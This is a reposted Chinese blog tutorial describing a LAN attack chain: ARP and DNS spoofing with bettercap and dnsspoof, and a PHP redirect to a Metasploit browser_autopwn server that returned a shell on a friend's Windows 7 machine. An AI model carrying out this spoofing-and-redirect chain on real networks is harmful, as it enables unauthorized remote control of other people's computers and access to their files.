前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >我是如何统治内网的

我是如何统治内网的

作者头像
哲洛不闹
发布2018-09-18 09:43:11
1.2K0
发布2018-09-18 09:43:11
举报
文章被收录于专栏:java一日一条

测试主机:kali 2016.2

工具:bettercap、metasploit、dnsspoof、armitage

前期准备工作

在kali下并没有集成bettercap,所以我们需要自己安装

安装完成

启动postgresql服务

metasploit数据库初始化

查看数据库链接状态,如果这里显示数据库未连接可以参考:传送门 连接数据库

启动armitage(关于armitage

准备一个hosts文件(用于DNS欺骗)

更改:刚才试了一下,在hosts文件中加上端口号好像会出现一些意料不到的问题。这里我们换个思路,直接到ip地址不加端口号,然后开启apache服务,然后将下面的代码保存为index.php放在根目录下(/var/www/html/)

代码语言:javascript
复制
<?php header("Location:http://10.167.33.1:8080"); ?>

这样在DNS欺骗后会跳到指定ip,然后在通过php重定向到我们的payload。

还有一种方法是在下边启动浏览器自动攻击插件时,将端口号直接改成80端口。 /**************************************zhun bei wan cheng *****************************************/ 启动浏览器自动攻击模块:browser_autopwn

等待他将所有payload加载完成

arp攻击(执行:bettercap -X)

DNS欺骗(忘了截图 图是后补的 所以参数有点不一样)

现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个pay可用

我们的DNS欺骗只对同一网关下的主机有效,但是我们共计用的URL只要能访问到我们的地址就可以。下图可以看到有两台win10主机为arp+dns欺骗过来的,而安卓两台win7是我将这个URL发给了我的朋友,当然他也是在内网中的。如果我们需要攻击一台公网中的主机可以参考公网的Shell如何返回到内网的Kali 。最终有一台win7的浏览器成功运行了我们的payload并返回了shell。

查看文件

屏幕截图

当然功能远远不止这些,更多好玩的可以自己探索。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2016-11-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 java一日一条 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档